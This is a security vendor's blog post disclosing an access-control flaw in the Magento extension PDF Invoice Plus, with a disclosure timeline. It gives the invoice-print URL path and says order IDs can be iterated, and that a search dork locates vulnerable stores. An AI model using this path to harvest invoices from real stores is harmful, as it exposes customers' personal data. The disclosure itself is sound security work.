Magento Extension PDF Invoice Plus Vulnerability by Astra Magento Security

About PDF Invoice Plus Magento Extension Vulnerability

A couple of weeks ago, our security team was performing a security audit on a customer store using Magento. While testing the extensions used by the customer, a critical vulnerability was found in the extension PDF Invoice Plus. This extension is a widely used extension by hundreds of Magento stores to generate invoices for customers. Usually, these invoices contain end customer address and sometimes even their personal information.

Consequences of the Vulnerability:

  • Loss of end user data
  • Anyone can download invoice of any other users
  • Leakage of invoice information via use of google dorks

The Details of Vulnerability:

Mass Exploitation Possible:

We realized that since the URL at which PDF Invoice Plus extension releases the invoice remains constant for almost every store, this can be made into a google dork. We tried the following google dork:

It showed all the websites using PDF invoice plus:

magento extension vulnerability - PDF Invoice Plus by getastra.com

In such Magento stores, the following part: pdfinvoiceplus/order/print/order_id/508/ when added to the main website URL leads to downloading of invoices generated for customers of that store. The number 508 can be iterated/changed or guessed based on the store.

It is highly recommended that if you are using this extension, please update to the latest version to prevent yourself from this Magento extension vulnerability.

Timeline

Vulnerability Found by Astra Team - 19/04/201725%
Reported to PDF Invoice Plus Team - 19/04/201750%
Worked on the Fix - 20/04/2017 to 27/04/201775%
Updated Version Released - 28/04/2017100%

PDF Invoice Plus team was very quick in understanding the issue and quickly work on fixing it. A person was quickly assigned from their team to work on the fix. Within no time a new version was sent to us to verify. After the verification, a secure version of the extension was released to their customers.

Was this post helpful?



Waiting to Get Hacked?

Get security tips & latest vulnerability fixes right in your inbox:

About The Author

Astra Team

We are on a mission to make web a more secure place, one website at a time!

1 Comment

  1. Hi to all, it’s really a nice for me to pay a quick visit this web page, it includes important Information.

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.

Close